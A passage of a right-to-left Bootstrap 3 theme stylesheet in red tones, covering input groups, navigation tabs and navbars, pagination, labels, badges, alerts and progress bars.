  background-color: #eeeeee;
  border: 1px solid #cccccc;
  border-radius: 0;
}
.input-group-addon.input-sm {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.input-group-addon.input-lg {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
  margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.input-group-addon:first-child {
  border-left: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child),
.input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group-addon:last-child {
  border-right: 0;
}
.input-group-btn {
  position: relative;
  font-size: 0;
  white-space: nowrap;
}
.input-group-btn > .btn {
  position: relative;
}
.input-group-btn > .btn + .btn {
  margin-right: -1px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:focus,
.input-group-btn > .btn:active {
  z-index: 2;
}
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group {
  margin-left: -1px;
}
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group {
  z-index: 2;
  margin-right: -1px;
}
.nav {
  padding-right: 0;
  margin-bottom: 0;
  list-style: none;
}
.nav > li {
  position: relative;
  display: block;
}
.nav > li > a {
  position: relative;
  display: block;
  padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.nav > li.disabled > a {
  color: #999999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
  color: #999999;
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  background-color: #eeeeee;
  border-color: #cc0000;
}
.nav .nav-divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #e5e5e5;
}
.nav > li > a > img {
  max-width: none;
}
.nav-tabs {
  border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
  float: right;
  margin-bottom: -1px;
}
.nav-tabs > li > a {
  margin-left: 2px;
  line-height: 1.42857143;
  border: 1px solid transparent;
  border-radius: 0 0 0 0;
}
.nav-tabs > li > a:hover {
  border-color: #eeeeee #eeeeee #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  color: #666666;
  cursor: default;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-bottom-color: transparent;
}
.nav-tabs.nav-justified {
  width: 100%;
  border-bottom: 0;
}
.nav-tabs.nav-justified > li {
  float: none;
}
.nav-tabs.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  right: auto;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-tabs.nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs.nav-justified > li > a {
  margin-left: 0;
  border-radius: 0;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs.nav-justified > .active > a,
  .nav-tabs.nav-justified > .active > a:hover,
  .nav-tabs.nav-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.nav-pills > li {
  float: right;
}
.nav-pills > li > a {
  border-radius: 0;
}
.nav-pills > li + li {
  margin-right: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
  color: #ffffff;
  background-color: #cc0000;
}
.nav-stacked > li {
  float: none;
}
.nav-stacked > li + li {
  margin-top: 2px;
  margin-right: 0;
}
.nav-justified {
  width: 100%;
}
.nav-justified > li {
  float: none;
}
.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  right: auto;
}
@media (min-width: 768px) {
  .nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs-justified {
  border-bottom: 0;
}
.nav-tabs-justified > li > a {
  margin-left: 0;
  border-radius: 0;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs-justified > .active > a,
  .nav-tabs-justified > .active > a:hover,
  .nav-tabs-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar {
  position: relative;
  min-height: 55px;
  margin-bottom: 20px;
  border: 1px solid transparent;
}
@media (min-width: 991px) {
  .navbar {
    border-radius: 0;
  }
}
@media (min-width: 991px) {
  .navbar-header {
    float: right;
  }
}
.navbar-collapse {
  padding-left: 20px;
  padding-right: 20px;
  overflow-x: visible;
  border-top: 1px solid transparent;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
  -webkit-overflow-scrolling: touch;
}
.navbar-collapse.in {
  overflow-y: auto;
}
@media (min-width: 991px) {
  .navbar-collapse {
    width: auto;
    border-top: 0;
    box-shadow: none;
  }
  .navbar-collapse.collapse {
    display: block !important;
    height: auto !important;
    padding-bottom: 0;
    overflow: visible !important;
  }
  .navbar-collapse.in {
    overflow-y: visible;
  }
  .navbar-fixed-top .navbar-collapse,
  .navbar-static-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    padding-left: 0;
    padding-right: 0;
  }
}
.navbar-fixed-top,
.navbar-fixed-bottom {
  position: fixed;
  left: 0;
  right: 0;
  z-index: 1030;
}
.navbar-fixed-top .navbar-collapse,
.navbar-fixed-bottom .navbar-collapse {
  max-height: 340px;
}
@media (max-device-width: 480px) and (orientation: landscape) {
  .navbar-fixed-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    max-height: 200px;
  }
}
@media (min-width: 991px) {
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    border-radius: 0;
  }
}
.navbar-fixed-top {
  top: 0;
  border-width: 0 0 1px;
}
.navbar-fixed-bottom {
  bottom: 0;
  margin-bottom: 0;
  border-width: 1px 0 0;
}
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
  margin-left: -20px;
  margin-right: -20px;
}
@media (min-width: 991px) {
  .container > .navbar-header,
  .container-fluid > .navbar-header,
  .container > .navbar-collapse,
  .container-fluid > .navbar-collapse {
    margin-left: 0;
    margin-right: 0;
  }
}
.navbar-static-top {
  z-index: 1000;
  border-width: 0 0 1px;
}
@media (min-width: 991px) {
  .navbar-static-top {
    border-radius: 0;
  }
}
.navbar-brand {
  float: right;
  height: 55px;
  padding: 17.5px 20px;
  font-size: 18px;
  line-height: 20px;
}
.navbar-brand:hover,
.navbar-brand:focus {
  text-decoration: none;
}
.navbar-brand > img {
  display: block;
}
@media (min-width: 991px) {
  .navbar > .container .navbar-brand,
  .navbar > .container-fluid .navbar-brand {
    margin-right: -20px;
  }
}
.navbar-toggle {
  position: relative;
  float: left;
  padding: 9px 10px;
  margin-left: 20px;
  margin-top: 10.5px;
  margin-bottom: 10.5px;
  background-color: transparent;
  background-image: none;
  border: 1px solid transparent;
  border-radius: 0;
}
.navbar-toggle:focus {
  outline: 0;
}
.navbar-toggle .icon-bar {
  display: block;
  width: 22px;
  height: 2px;
  border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
  margin-top: 4px;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
.navbar-nav > li > a {
  padding-top: 10px;
  padding-bottom: 10px;
  line-height: 20px;
}
@media (max-width: 990px) {
  .navbar-nav .open .dropdown-menu {
    position: static;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
  }
  .navbar-nav .open .dropdown-menu > li > a,
  .navbar-nav .open .dropdown-menu .dropdown-header {
    padding: 5px 25px 5px 15px;
  }
  .navbar-nav .open .dropdown-menu > li > a {
    line-height: 20px;
  }
  .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-nav .open .dropdown-menu > li > a:focus {
    background-image: none;
  }
}
@media (min-width: 991px) {
  .navbar-nav {
    float: right;
    margin: 0;
  }
  .navbar-nav > li {
    float: right;
  }
  .navbar-nav > li > a {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.navbar-form {
  padding: 10px 20px;
  margin-left: -20px;
  margin-right: -20px;
  border-top: 1px solid transparent;
  border-bottom: 1px solid transparent;
  -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
@media (min-width: 768px) {
  .navbar-form .inputbox,
  .navbar-form select,
  .navbar-form textarea,
  .navbar-form input {
    display: inline-block;
  }
}
@media (min-width: 768px) {
  .navbar-form .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .navbar-form .form-control-static {
    display: inline-block;
  }
  .navbar-form .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .navbar-form .input-group .input-group-addon,
  .navbar-form .input-group .input-group-btn,
  .navbar-form .input-group .form-control {
    width: auto;
  }
  .navbar-form .input-group > .form-control {
    width: 100%;
  }
  .navbar-form .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio,
  .navbar-form .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio label,
  .navbar-form .checkbox label {
    padding-right: 0;
  }
  .navbar-form .radio input[type="radio"],
  .navbar-form .checkbox input[type="checkbox"] {
    position: relative;
    margin-right: 0;
  }
  .navbar-form .has-feedback .form-control-feedback {
    top: 0;
  }
}
@media (max-width: 990px) {
  .navbar-form .form-group {
    margin-bottom: 5px;
  }
  .navbar-form .form-group:last-child {
    margin-bottom: 0;
  }
}
@media (min-width: 991px) {
  .navbar-form {
    width: auto;
    padding-top: 0;
    padding-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    border: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
  }
}
.navbar-nav > li > .dropdown-menu {
  margin-top: 0;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
  margin-bottom: 0;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.navbar-btn {
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
.navbar-btn.btn-sm {
  margin-top: 12.5px;
  margin-bottom: 12.5px;
}
.navbar-btn.btn-xs {
  margin-top: 16.5px;
  margin-bottom: 16.5px;
}
.navbar-text {
  margin-top: 17.5px;
  margin-bottom: 17.5px;
}
@media (min-width: 991px) {
  .navbar-text {
    float: right;
    margin-left: 20px;
    margin-right: 20px;
  }
}
@media (min-width: 991px) {
  .navbar-left {
    float: right !important;
  }
  .navbar-right {
    float: left !important;
    margin-left: -20px;
  }
  .navbar-left ~ .navbar-right {
    margin-left: 0;
  }
}
.navbar-default {
  background-color: #cc0000;
  border-color: #b30000;
}
.navbar-default .navbar-brand {
  color: #ffcccc;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #ff9999;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #ffcccc;
}
.navbar-default .navbar-nav > li > a {
  color: #ffcccc;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #cccccc;
  background-color: transparent;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media (max-width: 990px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffcccc;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
.navbar-default .navbar-toggle {
  border-color: #cc0000;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #cc0000;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #b30000;
}
.navbar-default .navbar-link {
  color: #ffcccc;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.navbar-default .btn-link {
  color: #ffcccc;
}
.navbar-default .btn-link:hover,
.navbar-default .btn-link:focus {
  color: #ffffff;
}
.navbar-default .btn-link[disabled]:hover,
fieldset[disabled] .navbar-default .btn-link:hover,
.navbar-default .btn-link[disabled]:focus,
fieldset[disabled] .navbar-default .btn-link:focus {
  color: #cccccc;
}
.navbar-inverse {
  background-color: #222222;
  border-color: #080808;
}
.navbar-inverse .navbar-brand {
  color: #999999;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-text {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: #080808;
}
@media (max-width: 990px) {
  .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
    border-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu .divider {
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
    color: #999999;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-inverse .navbar-toggle {
  border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
  border-color: #101010;
}
.navbar-inverse .navbar-link {
  color: #999999;
}
.navbar-inverse .navbar-link:hover {
  color: #ffffff;
}
.navbar-inverse .btn-link {
  color: #999999;
}
.navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link:focus {
  color: #ffffff;
}
.navbar-inverse .btn-link[disabled]:hover,
fieldset[disabled] .navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link[disabled]:focus,
fieldset[disabled] .navbar-inverse .btn-link:focus {
  color: #444444;
}
.breadcrumb {
  padding: 8px 15px;
  margin-bottom: 20px;
  list-style: none;
  background-color: #eeeeee;
  border-radius: 0;
}
.breadcrumb > li {
  display: inline-block;
}
.breadcrumb > li + li:before {
  padding: 0 5px;
  color: #999999;
  content: "/\00a0";
}
.breadcrumb > .active {
  color: #999999;
}
.pagination {
  display: inline-block;
  padding-right: 0;
  margin: 20px 0;
  border-radius: 0;
}
.pagination > li {
  display: inline;
}
.pagination > li > a,
.pagination > li > span {
  position: relative;
  float: right;
  padding: 6px 12px;
  margin-right: -1px;
  line-height: 1.42857143;
  color: #cc0000;
  text-decoration: none;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
  z-index: 2;
  color: #800000;
  background-color: #eeeeee;
  border-color: #dddddd;
}
.pagination > li:first-child > a,
.pagination > li:first-child > span {
  margin-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
  z-index: 3;
  color: #ffffff;
  cursor: default;
  background-color: #cc0000;
  border-color: #cc0000;
}
.pagination > .disabled > span,
.pagination > .disabled > span:hover,
.pagination > .disabled > span:focus,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
  border-color: #dddddd;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pager {
  padding-right: 0;
  margin: 20px 0;
  text-align: center;
  list-style: none;
}
.pager li {
  display: inline;
}
.pager li > a,
.pager li > span {
  display: inline-block;
  padding: 5px 14px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.pager .next > a,
.pager .next > span {
  float: left;
}
.pager .previous > a,
.pager .previous > span {
  float: right;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
}
.label {
  display: inline;
  padding: .2em .6em .3em;
  font-size: 75%;
  font-weight: 700;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: .25em;
}
a.label:hover,
a.label:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.label:empty {
  display: none;
}
.btn .label {
  position: relative;
  top: -1px;
}
.label-default {
  background-color: #999999;
}
.label-default[href]:hover,
.label-default[href]:focus {
  background-color: #808080;
}
.label-primary {
  background-color: #cc0000;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
  background-color: #990000;
}
.label-success {
  background-color: #3e9b52;
}
.label-success[href]:hover,
.label-success[href]:focus {
  background-color: #2f773f;
}
.label-info {
  background-color: #0099cc;
}
.label-info[href]:hover,
.label-info[href]:focus {
  background-color: #007399;
}
.label-warning {
  background-color: #ff8800;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
  background-color: #cc6d00;
}
.label-danger {
  background-color: #cc0000;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
  background-color: #990000;
}
.badge {
  display: inline-block;
  min-width: 10px;
  padding: 3px 7px;
  font-size: 12px;
  font-weight: bold;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  background-color: #999999;
  border-radius: 0;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.btn-xs .badge,
.btn-group-xs > .btn .badge {
  top: 0;
  padding: 1px 5px;
}
a.badge:hover,
a.badge:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.list-group-item > .badge {
  float: left;
}
.list-group-item > .badge + .badge {
  margin-left: 5px;
}
.nav-pills > li > a > .badge {
  margin-right: 3px;
}
.jumbotron {
  padding-top: 40px;
  padding-bottom: 40px;
  margin-bottom: 40px;
  color: inherit;
  background-color: #eeeeee;
}
.jumbotron h1,
.jumbotron .h1 {
  color: inherit;
}
.jumbotron p {
  margin-bottom: 20px;
  font-size: 21px;
  font-weight: 200;
}
.jumbotron > hr {
  border-top-color: #d5d5d5;
}
.container .jumbotron,
.container-fluid .jumbotron {
  padding-left: 20px;
  padding-right: 20px;
  border-radius: 0;
}
.jumbotron .container {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .jumbotron {
    padding-top: 64px;
    padding-bottom: 64px;
  }
  .container .jumbotron,
  .container-fluid .jumbotron {
    padding-left: 80px;
    padding-right: 80px;
  }
  .jumbotron h1,
  .jumbotron .h1 {
    font-size: 63px;
  }
}
.thumbnail {
  display: block;
  padding: 4px;
  margin-bottom: 20px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: border 0.2s ease-in-out;
  -o-transition: border 0.2s ease-in-out;
  transition: border 0.2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
  margin-left: auto;
  margin-right: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
  border-color: #cc0000;
}
.thumbnail .caption {
  padding: 10px;
  color: #444444;
}
.alert {
  padding: 15px;
  margin-bottom: 20px;
  border: 1px solid transparent;
  border-radius: 0;
}
.alert h4 {
  margin-top: 0;
  color: inherit;
}
.alert .alert-link {
  font-weight: bold;
}
.alert > p,
.alert > ul {
  margin-bottom: 0;
}
.alert > p + p {
  margin-top: 5px;
}
.alert-dismissable,
.alert-dismissible {
  padding-left: 35px;
}
.alert-dismissable .close,
.alert-dismissible .close {
  position: relative;
  top: -2px;
  left: -21px;
  color: inherit;
}
.alert-success {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-success hr {
  border-top-color: #c9e2b3;
}
.alert-success .alert-link {
  color: #356635;
}
.alert-info {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-info hr {
  border-top-color: #a6e1ec;
}
.alert-info .alert-link {
  color: #2d6987;
}
.alert-warning {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.alert-warning hr {
  border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
  color: #a47e3c;
}
.alert-danger {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-danger hr {
  border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
  color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 100% 0;
  }
}
@keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 100% 0;
  }
}
.progress {
  height: 20px;
  margin-bottom: 20px;
  overflow: hidden;
  background-color: #f5f5f5;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
  float: right;
  width: 0%;
  height: 100%;
  font-size: 12px;
  line-height: 20px;
  color: #ffffff;
  text-align: center;
  background-color: #cc0000;
  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  -webkit-transition: width 0.6s ease;
  -o-transition: width 0.6s ease;
  transition: width 0.6s ease;
}
.progress-striped .progress-bar,
.progress-bar-striped {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 40px 40px;
}
.progress.active .progress-bar,
.progress-bar.active {
  -webkit-animation: progress-bar-stripes 2s linear infinite;
  -o-animation: progress-bar-stripes 2s linear infinite;
  animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
  background-color: #3e9b52;
}
.progress-striped .progress-bar-success {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
  background-color: #0099cc;
}
.progress-striped .progress-bar-info {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
  background-color: #ff8800;
}
.progress-striped .progress-bar-warning {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
  background-color: #cc0000;
}
.progress-striped .progress-bar-danger {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
